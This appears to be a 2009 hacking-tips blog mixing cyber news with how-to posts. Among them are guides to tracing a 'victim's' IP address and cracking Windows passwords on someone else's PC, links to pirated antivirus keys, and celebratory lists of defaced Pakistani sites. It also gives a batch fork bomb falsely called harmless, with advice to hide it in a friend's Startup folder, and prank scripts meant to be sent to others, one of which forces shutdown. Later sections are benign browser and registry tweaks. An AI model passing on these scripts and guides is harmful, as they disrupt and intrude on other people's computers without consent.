The latest report by McAfee has pointed out that in 2010, Adobe Flash and Adobe Reader will be primary target for hackers. The "2010 Threat Predictions" report says that hackers are shifting their attention from Microsoft Office application to Adobe products as they become more popular, according to PC World.
"Cybercriminals have long picked on Microsoft products due to their popularity. In 2010, we anticipate Adobe software, especially Acrobat Reader and Flash, will take the top spot," reports McAfee. For a long Microsoft was the primary target of hackers but the software giant has tightened security in its recent OS releases, leading hackers to look for additional targets
search
Custom Search
Wednesday, December 30, 2009
Hackers to taget Adobe in 2010
Friday, December 18, 2009
Twitter hacked and defaced by “Iranian Cyber Army”
On 17th of this month twitter was hacked and defaced by “Iranian Cyber Army” . Twitter went offline for several hours . The defaced message read
Iranian Cyber Army
THIS SITE HAS BEEN HACKED BY IRANIAN CYBER ARMY
iRANiAN.CYBER.ARMY@GMAIL.COM
U.S.A. Think They Controlling And Managing Internet By Their Access, But THey Don’t, We Control And Manage Internet By Our Power, So Do Not Try To Stimulation Iranian Peoples To….
NOW WHICH COUNTRY IN EMBARGO LIST? IRAN? USA?
WE PUSH THEM IN EMBARGO LIST ;)
Take Care.
Below is the Google search result of Twitter
Islamic Terrorists hacks US drone video feeds
Terrorist of Iraq with the support of some Iranian hackers have hacked the video feeds of US pilot-less Predator Drone plane .The US military is reported to be in quiet uproar after it emerged that Iraqi terrorists have hacked and monitored the video feeds from Predators, pilotless aircraft used for unmanned surveillance.
Terrorists Used SkyGrabber Software to Hack Drone Video Feeds .Skygrabber,is a just US$25.95 Windows application.Using this software terrorist intercepted live video feeds from U.S. Predator drones, potentially providing them with information they need to evade or monitor U.S. military operations.This incident raised fears of remote control operated unmanned crafts being taken over and used against British and American targets.Though the insurgents were not able to control the 20 million dollar aircraft with their latest hacking techniques, they could watch live video feeds
The wall street journal said that the US military discovered their video feeds were being hacked late last year when they confiscated a terrorist laptop containing multiple copies of video feeds from Predator drones.
The military's suspicions were confirmed in July this year when further hacked video feed files were found on other confiscated laptops "leading some officials to conclude that militant groups trained and funded by Iran were regularly intercepting feeds".
Monday, December 14, 2009
Saturday, December 12, 2009
How to use Cain and Abel.
Hacking with Cain and Abel and How to get in to another computer using a great software Cain and Abel, Educational purposes only. Its not my responsibility what you do after watching this video.
Thursday, December 10, 2009
How to scan an ip adddress for open ports via nmap for hacking
How to scan an ip adddress for open ports via nmap for hacking .This video shows how Ip address can be scanned using nmap
Wednesday, December 2, 2009
Get Unlimited Free Google Wave Invitations
This is how you can get unlimited free Google Wave Invitations .The mandatory requirement for this trick is that ,you have at least One Google Wave Account and atleast One Google Wave Invitation left to send other people.
Step 1 -Go to http://www.gmail.com and create a new account.
Step 2 -Login at http://www.googlewave.com
Step 3 -Click Invite Others to Google Wave and write your Gmail address at Enter an Email Address Box.
Step 4 -Login at http://www.gmail.com with Id that you created in Step 1 and click Inbox. Accept the Invitation and you will be redirected to your New Google Wave Account.
Step 5 -Now you can see 8 Invites in your new Google Wave Account. So just follow Step 3 everytime wen u want to Invite some one but use his emaill address in email address box and wen you have only 1 Invite left follow the whole procedure again.
Thursday, November 26, 2009
ICW 26/11 tribute with revenge
Indian Cyber warriors (ICW) paid their tribute to the victims of 26/11 Mumbai attack .ICW has attacked a lot of Pakistani sites .Upto now 100+ sites have been defaced or attack . 26/11 was on for 60 hrs similarly ICW will keep on attacking Pakistani sites for 60 hrs .ICW started its attack on 26th and they are still going on . ICW is also checking the India websites those are vulnerable and are informing their admin to secure them. Here is the list of some of the websites hacked by ICW . Some of these sites may be restored or down.
http://riwaaj.com
www.nimrall.com
http://www.99rupeeshop.com/
http://www.efstudio.pk/
http://www.akc.com.pk/
http://www.helpline.org.pk/
http://www.pmrs.org.pk/index.htm
http://www.al-anjum.net/
http://amt.com.pk/index.html
http://www.akproperty.org/
http://www.foc.org.pk//
http://ajkmdrp.gov.pk/
http://www.haier.com.pk/
http://www.alshifaeye.com.pk/
http://funsms.pk
http://namaz.pk
http://pakistanway.com
http://workforce.com.pk
http://reezu.net
http://www.miusports.com.pk/
http://www.dailynewsmart.com.pk/
http://www.skpconsulting.net/
http://www.dotcare.com/
http://7starcabletv.com/
http://phoneride.com
http://maair.net/admin/viewarticles.php
http://www.pakiproperty.com/news.php
http://www.almahd.com.pk/
http://pictures.pk/ICW.htm
http://www.faisalabad.gov.pk/
http://www.nccpl.com.pk/index.html
http://takpakistan.com/
http://www.freeads.com.pk/images/icons/y0.php/
http://pakistancollege.net
http://agripakistan.com/
http://charteredtechnologies.com//
The list is too big can't be put here ! Enjoy Vande mataram
If you cant watch the above list here is the list of mirrors
http://zone-h.org/archive/defacer=ICW
http://www.zone-h.org/mirror/id/9928512
http://www.zone-h.org/mirror/id/9928488
http://www.zone-h.org/mirror/id/9928483
http://www.zone-h.org/mirror/id/9927292
http://www.zone-h.org/mirror/id/9928480
http://www.zone-h.org/mirror/id/9928477
http://www.zone-h.org/mirror/id/9928475
http://www.zone-h.org/mirror/id/9928472
http://www.zone-h.org/mirror/id/9928514
http://www.zone-h.org/mirror/id/9928513
http://www.zone-h.org/mirror/id/9928511
http://www.zone-h.org/mirror/id/9928515
http://www.zone-h.org/mirror/id/9928514
http://www.zone-h.org/mirror/id/9928513
http://www.zone-h.org/mirror/id/9928511
http://www.zone-h.org/mirror/id/9928510
http://www.zone-h.org/mirror/id/9928509
http://www.zone-h.org/mirror/id/9920880
http://www.zone-h.org/mirror/id/9928192
http://www.zone-h.org/mirror/id/9928190
http://www.zone-h.org/mirror/id/9862862
Monday, November 23, 2009
How to get someone ip without any software ?
Here is the easiest way to get the ip address without the use of any software's.
4 ways to trace someone ip address
Here are the three best ways of tracing ip address . There can be many but I am putting here 3 only .
----------------------------------------
1. Obtaining an IP from MSN or Yahoo or any Messenger.
----------------------------------------
Firstly we learn the method used by most people when they want to get
someone else IP Address.
Step 1 - Start MSN Messenger and login as yourself.
Step 2 - Hit your "Start" button and click run. Type into the white box
"Command" or type cmd(without the quotation marks)
Step 3 - Type in "Netstat -N" (without the quotation marks) into the
black box and hit enter.
Step 4 - Start a conversation with your 'victim' and send them a file.
Once they accept the file Hit your "Start" button and click run. Type
into the white box "Command" (without the quotation marks) and Type in "Netstat -N"
(without the quotation marks) into the black box and hit enter.
Step 5 - Look in the middle column of both your MS Dos boxes and look
in the newer window for the IP address that has magically appeared in
the middle column. This is your victim's IP Address.
-----------------------------------
2. Obtaining an IP from an E-Mail.
-----------------------------------
Ok, lets say the person does not use MSN Messenger
we can still get his IP address from most E-Mail address. In this example we
shall use Outlook Express to view the E-Mails in.
Step 1 - Load Outlok express and left click on an E-Mail that was sent
from your 'victim'
Step 2 - Right click this E-Mail and click the "Properties" button.
Step 3 - Now Click on the tab displaying as it's text "Details" and
look for the buttom saying "Message Source", once found (not hard) click it.
Step 4 - Look in all the jargon for something like "X-Originating-IP: "
with a number after the colon. This number is the sender's IP Address.
Step 5 - If you cannot find "X-Originating-IP: " then do not worry.
Look for instead "Received:", and go along this string until you come
to a number in brackets, this however maybe an IP but it might not be
the IP address of the 'victim', infact if they sent the E-Mail from a
E-Mail service (like hotmail.com) then chances are it is not their
IP address.
---------------------------------------
3. Obtaining an IP from Physical Access.
---------------------------------------
If you have physical access to a computer then getting the IP address
is simple.
Step 1 - Click the "Start" button and hit "Run". Type in "Command" and
hit enter.
Step 2 - Type in "ipconfig" OR "winipcfg" and hit enter now look for
where it says "IP Address:", next to this is the IP of the computer you
are using
The forth method is posted in video section ,Check there
Wednesday, November 18, 2009
How to stay anonymous online !
You may be knowing that you leave your footprints everywhere you go online. Your every activity is recorded in the logs of the servers you visit and correlated to your IP address, which gives the admins everything they need in order to find your location. Check this link for a live example:
http://whatismyipaddress.com/
No one likes to be traced. This tutorial will show you how to securely hide your IP address using proxy online.
What are Proxies? You can’t change your IP address and expect to still be able to receive communication from the server you’re contacting. Why’s ? Because the server will just send its response to the computer it thinks sent the packet, which means you would not receive any response but the computer with the address you spoofed would receive information it didn’t ask for. but it’s not very helpful to us when we want to be able to receive information from a server without giving
away our true identity. This is where proxies come in. A proxy is a sort of middle man When you use a proxy, all your browser’s traffic is sent not to the target server, but to the proxy server, which then relays your traffic to the target. The target in turn responds to the proxy server, which relays the traffic back to you.
What is TOR?
TOR is in effect a very well organized chain proxy . It routs your traffic through different paths every ten minutes and randomly chooses the proxies you’ll use on each hop to give you very strong anonymity. See here for more details: http://www.torproject.org/overview.html.en Whenever you’re doing something sensitive or private online, TOR is your best option. However, there is one downside: depending on the proxies that are incorporated into your proxy chain, it can be very slow. This can usually be resolved by disconnecting from the TOR network and reconnecting. How to Install It On debian-based linux like ubuntu or backtrack, this is a breeze. Simply open up a terminal and
type in: [code]
sudo apt-get install tor
[/code]
On windows, first download the tor client here: http://www.torproject.org/easy-
download.html.en and run the installer. Choose full installation if you’re asked. Make sure you have Firefox closed. Configuring Firefox for TOR
There used to be a lot of manual configuration involved with setting up firefox to go through tor (manually changing proxy settings when you wanted to use it), but now there’s a handy firefox plugin called “Tor Button” that lets you toggle back and forth just by a single mouse click. It comes preinstalled with the windows installer. On Linux, you can install it here:
https://addons.mozilla.org/en-US/firefox/addon/2275
And that’s it! You can now head back over to http://whatismyipaddress.com or
http://cmyip.com and see where the server thinks you’re coming from.
Thursday, November 12, 2009
Awesome Gifts For Pakistan By Indians
Pakistani hackers hacked 50 Indian govt sites... Indian hackers replied.. by hacking 100 of them... have a look.
]http://www.mfa.gov.pk/indian_hackers.htm[
]http://www.agp.gov.pk/indian_hackers.htm[
]http://www.alp.gov.pk/indian_hackers.htm[
]http://www.cii.gov.pk/indian_hackers.htm[
]http://www.cmsindh.gov.pk/indian_hackers.htm[
]http://www.cmtl.gov.pk/indian_hackers.htm[
]http://www.eadtraining.gov.pk/indian_hackers.htm[
]http://www.enercon.gov.pk/indian_hackers.htm[
]http://www.environment.gov.pk/indian_hackers.htm[
]http://www.fab.gov.pk/indian_hackers.htm[
]http://www.fgehf.gov.pk/indian_hackers.htm[
]http://www.fsa.gov.pk/indian_hackers.htm[
]http://www.gefpak.gov.pk/indian_hackers.htm[
]http://www.heritage.gov.pk/indian_hackers.htm[
]http://www.lmis.gov.pk/indian_hackers.htm[
]http://www.met.gov.pk/indian_hackers.htm[
]http://www.tourism.gov.pk/indian_hackers.htm[
]http://www.commerce.gov.pk/indian_hackers.htm[
]http://www.sindhpolice.gov.pk/indian_hackers.htm[
]http://www.topians.edu.pk/indian_hackers.htm[
]http://www.usc.com.pk/indian_hackers.htm[
]http://www.topians.edu.pk/indian_hackers.htm[
]http://www.sindh.gov.pk/indian_hackers.htm[
]http://www.pwd.gov.pk/indian_hackers.htm[
]http://www.pmnh.gov.pk/indian_hackers.htm[
]http://www.pmad.gov.pk/indian_hackers.htm[
]http://www.pifra.gov.pk/indian_hackers.htm[
]http://www.pha.gov.pk/indian_hackers.htm[
]http://www.pcsir.gov.pk/indian_hackers.htm[
]http://www.pcrwr.gov.pk/indian_hackers.htm[
]http://www.pcret.gov.pk/indian_hackers.htm[
]http://www.pcb.gov.pk/indian_hackers.htm[
]http://rajpootmedical.com/[
]http://www.agp.gov.pk/index.html[
]http://mrbelt.com/[
]http://rdi.org.pk/[
]http://www.arduousgroup.com/[
]http://050telecom.com/[
]http://www.win.org.pk/[
]http://www.dailynewsmart.com.pk/[
]http://www.unapakistan.org.pk/[
]http://mobilezone.com.pk/admin/[
]http://accurateboxing.com/[
]http://www.rustam.com.pk/[
]http://www.tecno.com.pk/[
]http://www.salim-group.com/[
]http://www.pakstarsports.com[/
]http://test.sellpropertypk.com/[
]http://www.motivexonline.com/[
]http://www.sundoosaddlery.com/[
]http://www.menzee.biz/[
]http://www.jashanwalk.com/[
Some of the servers have been down by the gov. but many of them still on ... to check.... just try to see from last.....
I saw this post on orkut.... so... i m just spreading the message..... Vande Mataram... and nice work by ICW
Keys for NOD32 & Smart Security
Here is the list of sites the provide free Keys for NOD32 & Smart Security anti-virus
http://www.nod321.com/
http://www.nod32keys.com/
http://www.nod32sky.com/
http://www.for-ever.cn/nod32/
http://nod32logins.blogspot.com/
http://www.nod321.cn/
Tuesday, October 20, 2009
Crack Windows XP/Vista password with Ophcrack
Ophcrack can be used to locate windows xp/vista password . If not, it will locate the hash for you and a program is available to crack the hash as well.
You need to have ophcrack for this .You can get it from the following links.
Windows XP
download
Windows Vista:
download
Now burn these files to cd as ISO file and set your victims pc to boot off from cd/dvd-rom.On the successful run it will produce the password hash.
Note, some passwords cannot be crack depending on the characters and amount The LM has a capacity of 14 characters to crack. If longer, you'll have to use hash.
Now you need to crack this hash to get the actual password.I use the following program to do that
download
download
Monday, October 12, 2009
Hacker ka pyaar
Kabh Se Boot kiye Baithaa Hoon
PC Apne Pyar Ka
Kaise Type Karoon Mein Lekin
Password Izhaar Ka
Dil ki Chaaron Drives Pe Meine
Jaana Tujhko Search Kiya
Yahoo!, Yahoo!, Google!, Google!
Kitna Paisa Kharch Kiya
Tere Chehre Pe Gussay Ka
ScreenSaver Jab Aata Hai
Mere Chehre Ka Display Tabh
Greyscale Ho Jata Hai
Jinke Links Abh Toot Chuke Hai
Shortcuts Woh Wipe Karo
Apani ankhiyon ke browser mei
Mera Address Type Karo
Aakar Dekho To Mujhko
Mein SQL Prompt PAr Rehta Hoon
Tere Login Ki Chaah Mein Kitne
Scott/Tiger Sehtaa Hoon
Chhahat Hai Tere Pyar Ki Site
Raat Din Mein Hack Karoon
Patthar Dil-Daddy Ka Tere
Software Bhi Crack Karoon
Buddha Agar Jo Maan Gaya Toh
Hum Connect Ho Jaayenge
VSNL Ke Server Ke
Phere Phir Saat Lagaayenge
Ginti Ke Bas Bache Hai Baaki
Mere Jeewan KE Yeh Pal
Tu Jo Aakar Pyar Se Chhhoo Le,
Mil Jaayega Aur Ek Kal,
JAI ORACLE!! JAI ORACLE!!
Thursday, July 16, 2009
Advanced SQL Injection
This is the video of the talk titled "Advanced SQL Injection" given at LayerOne 2009 by Joe McCray.SQL Injection is a vulnerability that is often missed by web application security scanners, and it’s a vulnerability that is often rated as NOT exploitable by security testers when it actually can be exploite.
Friday, July 3, 2009
Cross Site Scripting (XSS)
Cross Site Scripting (XSS) is a code injection vulnerability found in web applications and is generally used by malicious hackers to hijack a legitimate user's session with the website.XSS vulnerabilities are caused because of improper validation of user input by the Server and then sending this invalidated input back to the user in some exploitable form.
Tuesday, June 30, 2009
Thursday, June 25, 2009
Access a Website That Allows Google But Not You
when you conduct a search on Google and the search engine returns a number of good results, but when you try to open the ones that looks the most interesting you get a registration page. The reason is that there are some websites that allow Google but not unregistered or you. The solution is to disguise yourself as Google changing your browser's identity (named user agent) to Googlebot.
Internet Explorer
Copy this code into notepad and save it as a .reg file (name it googlebot-useragent.reg for example)
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\
Internet Settings\5.0\User Agent]
@="Googlebot/2.1"
"Compatible"="+http://www.googlebot.com/bot.html"
Now double-click the .reg file you've created to merge it into Windows registry. In order to restore the default user agent copy this code into notepad and save it as a .reg file (name it standard-useragent.reg for example)
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\
Internet Settings\5.0\User Agent]
@="Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
Now double-click the .reg file you've created (or downloaded) in order to change back to the default user agent.
Firefox
Type in about:config in the address bar and down to find "general.useragent.extra.firefox".
Double click on it and type in "Googlebot 2.1".
This will change Firefox user agent to the google bot. To change the user agent back to the original click Reset to restore the property to its default value.
Opera ,Safari
There is no way to change the user agent to Googlebot in Opera and safari
Friday, June 19, 2009
Get most out of Google
Google Search Options
Specific file types: *.xls, *.doc, *.pdf *.ps *.ppt *.rtf
Google allows you to search for specific file types, so instead of getting html-files as a result (websites) you get Microsoft excel files for example. The search string you would use would be this:
Filetype:xls (for excel files) or filetype:doc for word files.
But maybe more interesting would be searching for *.db files and *.mdb files. Google by the way doesn’t tell you, you can search for *.db and *mdb files. I wonder what other file types one can search for. Things that come to mind are *.cfg files or *.pwd files, *.dat files, stuff like that. Try and think of something that might get you some interesting results.
Inurl
Another useful search option is the inurl: option which allows one to search for a certain word one would want to be in the url. This gives you the opportunity to search for specific directories/folders, especially in combination with the “index of” option. An example would be inurl:master-tricks which would give you results of website urls that have the word “master-tricks” in the url.
Index of
The index of option is another option that isn’t especially thought of by the creators of google, but comes in very handy. If you use the “index of” string you will find directory listings of specific folders on servers. An example could be: "index of” master-tricks or index.of.master-tricks which would get you many directory listings of master-tricks folders. (don’t forget to use the quotes in this case since you are looking for the entire “index of” string, not just for “index” and “of”)
Site
The site option allows you to come up with results that only belong to a certain domain name extension or to a specific site. For example one could search for .com sites or .box.sk sites or .nl sites, but also for results from just one site. An example of a search string would be: Site:org
Intitle
Intitle is another nice option. It allows you to search for html files that have a certain word or words in the title. The format would be intitle:wordhere.
Link
The Link option allows you to check which sites link to a specific site. For example link:http://pratikthorve.blogspot.com
Combining search options
The above mentioned search options might or might not be known to you, but even though they can amount to some interesting results, it’s a fact that when you start combining them, that’s when google’s magic starts to show. For example, one could try this search string: inurl:master-tricks intitle:master-tricks or this one: site:org filetype:xls "password" .
Try this fork bomb
This is a small code , which will make a command run over and over until the computer cannot handle any more programs and the computer will freeze or shutdown.
!!!!THIS IS HARMLESS AND WILL DO NO DAMAGE TO YOUR COMPUTER!!!!!
To make this open note pad and type:
@echo off
:START
start a.bat
GOTO START
The code above must be saved as a.bat and when the other person opens it nothing will appear but in the background it will keep opening its self until the computer freezes or shuts down.
You can try this on your friends by putting it in the Startup.
Thursday, May 7, 2009
Some fun hacks with vbscript and batch files
Cycle a message in your friends computer
open your notepad and type the following lines of code
@ECHO off
:Begin
msg * Hi
msg * Are you having fun?
msg * I am!
msg * Lets have fun together!
msg * Because you have been o-w-n-e-d
GOTO BEGIN
save it as anyfilename.bat
run and see the magic
Convey message to your friend and shutdown his/her computer
open your notepad and type the following lines of code
@echo off
msg * I don't like you
shutdown -c "Error! You are too stupid!" -s
Save it as "Anything.BAT" and send it.
Toggle your friend's Caps Lock button simultaneously
open your notepad and type the following lines of code
Set wshShell =wscript.CreateObje ct("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop
Save it as "Anything.VBS" and send it.
Continually pop out your friend's CD Drive. If he / she has more than one, it pops out all of them!
open your notepad and type the following lines of code
Set oWMP = CreateObject("WMPlayer.OCX. 7")
Set colCDROMs = oWMP.cdromCollectio n
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item( i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item( i).Eject
Next
End If
wscript.sleep 5000
loop
Save it as "Anything.VBS" and send it.
Frustrate your friend by making this VBScript hit Enter simultaneously
open your notepad and type the following lines of code
Set wshShell = wscript.CreateObjec t("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop
Save it as "Anything.VBS" and send it.
Sunday, April 19, 2009
8 hacks to make Firefox amazingly fast
Double your browser's speed in just five minutes
For about five minutes work and for the cost of precisely nothing at all. Here's what you need to do to make your Firefox extreamly fast.
1. Enable pipelining
Browsers normally sends a request to a server then wait for a response before continuing. Pipelining is a more aggressive technique that lets them send multiple requests before any responses are received, often reducing page download times. To enable it, type about:config in the address bar, double-click network.http.pipelining and network.http.proxy.pipelining so their values are set to true, then double-click network.http.pipelining.maxrequests and set this to 8.
Keep in mind that some servers don't support pipelining, though, and if you regularly visit a lot of these then the tweak can actually reduce performance. Set network.http.pipelining and network.http.proxy.pipelining to false again if you have any problems.
2. Render quickly
Large, complex web pages can take a while to download. Firefox doesn't want to keep you waiting, so by default will display what it's received so far every 0.12 seconds (the "content notify interval"). While this helps the browser feel snappy, frequent redraws increase the total page load time, so a longer content notify interval will improve performance.
Type about:config and press [Enter], then right-click (Apple users ctrl-click) somewhere in the window and select New > Integer. Type content.notify.interval as your preference name, click OK, enter 500000 (that's five hundred thousand, not fifty thousand) and click OK again.
Right-click again in the window and select New > Boolean. This time create a value called content.notify.ontimer and set it to True to finish the job.
3. Faster loading
If you haven't moved your mouse or touched the keyboard for 0.75 seconds (the content switch threshold) then Firefox enters a low frequency interrupt mode, which means its interface becomes less responsive but your page loads more quickly. Reducing the content switch threshold can improve performance, then, and it only takes a moment.
Type about:config and press [Enter], right-click in the window and select New > Integer. Type content.switch.threshold, click OK, enter 250000 (a quarter of a second) and click OK to finish.
4. No interruptions
You can take the last step even further by telling Firefox to ignore user interface events altogether until the current page has been downloaded. This is a little drastic as Firefox could remain unresponsive for quite some time, but try this and see how it works for you.
Type about:config, press [Enter], right-click in the window and select New > Boolean. Type content.interrupt.parsing, click OK, set the value to False and click OK.
5. Block Flash
Intrusive Flash animations are everywhere, popping up over the content you actually want to read and slowing down your browsing. Fortunately there's a very easy solution. Install the Flashblock extension (flashblock.mozdev.org) and it'll block all Flash applets from loading, so web pages will display much more quickly. And if you discover some Flash content that isn't entirely useless, just click its placeholder to download and view the applet as normal.
6. Increase the cache size
As you browse the web so Firefox stores site images and scripts in a local memory cache, where they can be speedily retrieved if you revisit the same page. If you have plenty of RAM (2 GB of more), leave Firefox running all the time and regularly return to pages then you can improve performance by increasing this cache size. Type about:config and press [Enter], then right-click anywhere in the window and select New > Integer. Type browser.cache.memory.capacity, click OK, enter 65536 and click OK, then restart your browser to get the new, larger cache.
7. Enable TraceMonkey
TraceMonkey is a new Firefox feature that converts slow Javascript into super-speedy x86 code, and so lets it run some functions anything up to 20 times faster than the current version. It's still buggy so isn't available in the regular Firefox download yet, but if you're willing to risk the odd crash or two then there's an easy way to try it out.
Install the latest nightly build (ftp://ftp.mozilla.org/pub/firefox/nightly/latest-trunk/), launch it, type about:config in the address bar and press Enter. Type JIT in the filter box, then double-click javascript.options.jit.chrome and javascript.options.jit.content to change their values to true, and that's it - you're running the fastest Firefox Javascript engine ever.
8. Compress data
If you've a slow internet connection then it may feel like you'll never get Firefox to perform properly, but that's not necessarily true. Install toonel.net (toonel.net) and this clever Java applet will re-route your web traffic through its own server, compressing it at the same time, so there's much less to download. And it can even compress JPEGs by allowing you to reduce their quality. This all helps to cut your data transfer, useful if you're on a limited 1 GB-per-month account, and can at best double your browsing performance.
20 registry hacks to make your PC more awesome as never before
Exploring the lesser-known Control Panel applets is another useful technique, and browsing the command line applications in Windows' System32 folder can be interesting. But let's be realistic. There's nothing that quite compares to the Registry.
It's packed with useful settings that can improve performance, fix security holes and change even the most fundamental Windows behaviour for the better. And many of these features simply can't be accessed in any other way. Be careful, though: the Registry has more than its fair share of traps.
If you're not cautious, you could cause more problems than you solve. But with a little care you can get on with creating a better system that's tailored towards your needs.Here are some great registry hacks
1. Improve security
If strangers have physical access to your PC, it's easy for them to plug in a USB flash drive and make copies of your data. If you're using Windows XP SP2 or later, though, there's a simple way to prevent this from happening.
Go to 'HKLM\SYSTEM\CurrentControlSet\Control\StorageDevicePolicies', create a DWORD value called 'WriteProtect' and set it to 1. You'll be able to read USB drives, but not write to them any more.
2. Tame UAC
Windows Vista's User Account Control raises so many alerts that many people just turn it off. But do that and you'll also lose useful features like IE's protected mode. If you really can't live with UAC, try disabling the alerts for administrators: you won't get any more hassle, but UAC will run in the background and you'll still get its other features.
To do this, set 'HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin' to 0. You can restore normal UAC behaviour by setting it to 2.
3. Change the owner
Install Windows on your PC and you'll be asked to enter your name, which is then stored as the registered owner (run WinVer to see this on your system). If you've got a second-hand PC, you probably want to change the name stored as the registered owner. There's no obvious way to do this, and that's where the Registry comes in.
Browse to 'HKLM\SOFTWARE\Microsoft\WindowsNT\CurrentVersion' and you'll see both a 'RegisteredOwner' and 'RegisteredOrganization' value. Double-click either to change them.
4. Sort files properly
Sorting filenames in Explorer can be a problem. By default, it will place 'File_v2.txt' before 'File_v15. txt': that's not ASCII ordering, but it seems to be sensible. But what if the 'v' refers to a version number, and actually File_v15.txt should come first? Suddenly Explorer's default system doesn't work at all.
To restore regular ASCII file ordering, go to 'HKLM\Software\Microsoft\Windows\Currentversion\Policies\Explorer', create a DWORD value called 'NoStrCmpLogical' and set it to 1. Delete the key to restore the standard Explorer approach.
5. Troubleshoot startup
If Windows is taking its time to start up or shut down, there might be a problem. To find out what's going on, go to 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System', create a DWORD value called 'verbosestatus' and set it to 1. Restart your PC and Windows will tell you what it's getting up to.
6. Manage folder types
Windows Vista's Explorer will 'intelligently' choose your folder type based on its contents. But this means that a Download folder will change to a Music folder if you grab a few MP3s. To fix this, go to 'HCU\Software\Classes\Local Settings\Software\Microsoft\Windows\Shell', delete the 'Bags' subkey and then create a new Bags key in the same location.
Create a key called 'AllFolders' beneath Bags, and a key called 'Shell' below that. Click it to open 'HCU\Software\Classes\LocalSettings\Software\Microsoft\Windows\Shell\ Bags\AllFolders\Shell'. Right-click the right-hand pane, choose 'New | String Value' and call this 'FolderType'. Then double-click FolderType and set its value to 'NotSpecified'. You'll still be able to change the folder type, but Vista will no longer assign one. (See steps 10 to 20 here if you need more help.)
7. Easy encryption
Some versions of Windows have always allowed you to encrypt files, but it's an awkward process; you must right-click the file, select 'Properties', click the 'Advanced' button, check 'Encrypt contents to secure data' and then press 'OK' twice.
For a simpler alternative, go to 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced', create a new DWORD called 'EncryptionContextMenu' and set it to 1. Now you can just right-click a file and select 'Encrypt'.
8. Access folders fast
Get speedy access to any folder by pinning it to the Start menu. Run REGEDIT, go to 'HKCR\Folder\shellex\ContextMenuHandlers', right-click 'ContextMenuHandlers' and click 'New | Key'.
Type '' (as ever, without quotation marks) and press [Enter]. Now hold down [Shift], right-click a folder and select 'Pin to Start Menu'.
9. Speed up copy times
Vista gives a high priority to your soundcard, so you should get glitch-free audio no matter what you're doing. This can cause slower network copy speeds, however.
To tweak this, browse to 'HKLM\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Multimedia\SystemProfile'. Try setting 'NetworkThrottlingIndex' to more than 10 – 50 or 60 should be effective – then reboot and test your network speeds again. Read more here.
10. Fix the drive listing
If Explorer no longer lists your DVD drive (or thinks that it's a DVD-ROM and can't burn discs), go to 'HKLM\System\CurrentControlSet\Control\Class\' and delete the 'UpperFilters' or 'LowerFilters' settings.
This usually works, but it may break whatever application caused the problem in the first place. If a program stops working, check to see if it has an update, then reinstall it.
11. Access display settings quickly
Right-click the desktop in Windows Vista and you can't directly access the display settings. Windows 7 will fix this, but in the meantime go to 'HKCR\Directory\Background\Shell', right-click 'Shell', select 'New | Key' and call it 'Display Settings'.
Double-click '(Default)' in the right-hand pane and enter 'Display Settings' in the Value Data box. Now right-click Display Settings in the left-hand pane, select 'New | Key' again and call this key 'command'.
Double-click this new key's (Default) value and enter this text: 'rundll32 shell32.dll,Control_ RunDLL DESK.CPL,@0,3'. (That's a zero following the @ sign, and take care to use the right cases.) Click 'OK' and right-click the desktop to see the new Display Settings option.
12. Multiple Live Messenger log-ins
By default, Windows Live Messenger only lets you log into one account at a time. To rectify this situation, go to 'HKLM\Software\Microsoft\WindowsLive\Messenger', create a DWORD value called 'Multiple Instances' and set it to 1. Delete the value to restore things to the way they were beforehand.
13. Clean the menus
You've uninstalled an application, but it's left you a gift: several now-useless right-click context menu entries. To fix this, go to 'HKCR\*' and 'HKCR\Directory'. Expand the shell, then the 'shellex\ContextMenuHandlers' keys and look for any keys beneath these that relate to your unwanted command.
On our PC, the key 'HKCR\*\shellex\ContextMenuHandlers\7-Zip' links to the 7-Zip context menu, for instance, so to get rid of that we would right-click the 7-Zip part in the left-hand pane and click 'Delete'. But be careful – only delete a key if you're really sure it's the right one.
14. Speed up backups
Windows XP's NTBACKUP improves its performance by maintaining a list of system files it knows you won't want to back up (such as the paging file). Add your own files and folders that you're not bothered about and you'll get even better results.
View the list at 'HKLM\SYSTEM\CurrentControlSet\Control\BackupRestore\FilesNotToBackup'.
15. Change the default installation folder
Most installations default to the Program Files folder, but if you want to point this elsewhere, navigate to 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion', change the 'ProgramFilesDir' entry to point at your chosen folder and reboot.
16. Rename drives
Add a memory card reader to a PC and Explorer will often cram the Computer folder with similar sounding drive names ('Removable Drive D:', 'Removable Drive E:' and so on), making it difficult to tell them apart. But it doesn't have to be that way.
If drive G: is a CompactFlash slot, say, then a few Registry tweaks can change it to read 'CompactFlash (G:)', making things much clearer. Start at 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer' and create a key called 'DriveIcons'.
Within that, create a key with the drive letter ('G' in this example), and within that, create a new key called 'DefaultLabel'. Double-click this key's (Default) value entry, give it the name 'CompactFlash' (or whatever you like) and click 'OK'. Restart Explorer or press [F5] to see the change.
17. Wipe the page file
Windows stores memory pages in its paging file as you work. That's fine unless an intruder gets access to your system. If so, they may then be able to browse the paging file and extract confidential information.
To avoid this, go to 'HKLM\SYSTEM\CurrentControlSet\Control\SessionManager\MemoryManagement', set the 'ClearPageFileAtShutdown' value to 1 and reboot. Windows will now wipe the page file every time it shuts down, lengthening the process but increasing your security.
18. Crash on cue
Blue-screen crashes are usually bad news, but occasionally you might want to initiate one yourself. You might need to test Windows' error reporting, for example. There's a Registry trick that can help achieve this.
Go to 'HKLM\SYSTEM\CurrentControlSet\Services\i8042prt\Parameters', create a DWORD called 'CrashOnCtrlScroll' and set it to 1. Reboot your computer, and to crash it just hold down the right [CTRL] and press [Scroll Lock] twice. Use this sparingly: it's a crash like any other, and there's a chance of hard drive corruption. To be safe, delete the CrashOnCtrlScroll value when you're done.
19. Save CPU time
